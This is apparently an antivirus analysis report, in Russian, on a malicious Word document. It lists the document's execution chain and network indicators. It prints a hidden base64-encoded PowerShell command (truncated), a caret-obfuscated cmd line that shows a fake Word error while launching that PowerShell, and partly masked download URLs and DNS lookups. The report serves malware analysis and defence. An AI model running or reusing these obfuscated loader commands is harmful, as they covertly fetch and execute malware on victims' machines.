Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enc IAAgACQAOABEAEUAIAAgAD0AIABbAFQAWQBQAGUAXQAoACIAewAwAH0AewAzAH0AewA0AH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAFMAJwAsACcAUgBlAEMAdABvAFIAeQAnACwAJwBtAC4AaQBPAC4ARABpACcALAAnA...
Сетевая активность
TCP
Запросы HTTP GET
- http://ki#####complements.com/too-much-phppq/n65U/
- http://www.au####k-baden.at/wp-content/w0Vb/
UDP
- DNS ASK al###shift.com
- DNS ASK oj#####gremezcal.com
- DNS ASK sn######val-services.com
- DNS ASK ki#####complements.com
- DNS ASK im###ioone.com
- DNS ASK au####k-baden.at
- DNS ASK sh##.#nimewho.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABEAEUAIAAgAD0AIABbAFQAWQBQAGUAXQAoACIAewAwAH0Ae...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
